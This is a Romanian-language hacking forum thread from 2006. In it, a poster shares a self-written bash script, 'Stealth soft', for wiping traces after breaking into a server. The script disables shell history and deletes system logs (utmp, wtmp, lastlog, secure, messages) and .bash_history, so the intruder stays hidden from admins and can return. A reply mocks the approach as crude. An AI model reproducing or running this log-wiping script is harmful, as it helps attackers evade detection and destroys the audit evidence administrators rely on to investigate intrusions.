thazer Posted June 28, 2006 Report Posted June 28, 2006 Multi intra pe servere si uita sa stearga log-urile , sunt si eu unul din acei "multi" , stai intrii pe un root bine mersi , si poc dupa 2 zile bye server , cum .. pai log-uri ... ce face-m cu log-urile .. le sterge-m ce puii nostri , fara log-uri mici sanse ca admin-ul sa-si dea seama de unde a venit hacker-ul si modul de pentrare al serverului , si poate mai tarziu il mai hack-uiesti odata script-ul este facut de mine , scris in bash deci nu`i mare scofala .. btw negesita root , poate fi rulat si de user dar in acest caz se sterge doar listele apartinand userului respectivp.s.sterge toate log-urile , ruland scriptul cand esti inca logat te ascunde din last who w , in ciuda altor script-uri care te "ascund" unele strica si logarea in continuare .. eu l-am facut ca dupa ce s-a rulat , log-area sa fie in continuare posibila... prietenii stiu de ce a da si ink ceva scriptul e ver. light ;P#!/bin/bashecho "#####################"echo "# Stealth soft #"echo "#####################"echo "Unsetting Histfile&Histsave&Watch"unset HISTFILEunset HISTSAVEunset WATCHexport HISTFILE=/dev/nullecho "Done!"history -necho "Deleting Compromisign files"rm -rf .bash_historyrm -rf /var/run/utmprm -rf /var/run/wtmp -rm -rf /var/log/lastlogrm -rf /usr/adm/lastlogcd /var/runtouch utmpchmod 664 utmprm -rf .bash_historycd /var/log/rm -rf wtmprm -rf securerm -rf lastlogrm -rf messagesecho "Done!"touch messagesstouch wtmptouch securetouch lastlogecho "Deleting user history"cd /rootrm -rf .bash_historytouch .bash_historycdrm -rf .bash_historytouch .bash_historyecho "Done! All Ok!" Quote
axxl2006 Posted July 19, 2006 Report Posted July 19, 2006 lool Cu siguranta ca adminul nu-si va da seama ca cineva a umblat in serverul lui. Puteai sa pui si tu numele de "Log deleter" :@ S-au inventat si editoarele wtmp, utmp, lastlog, etc Quote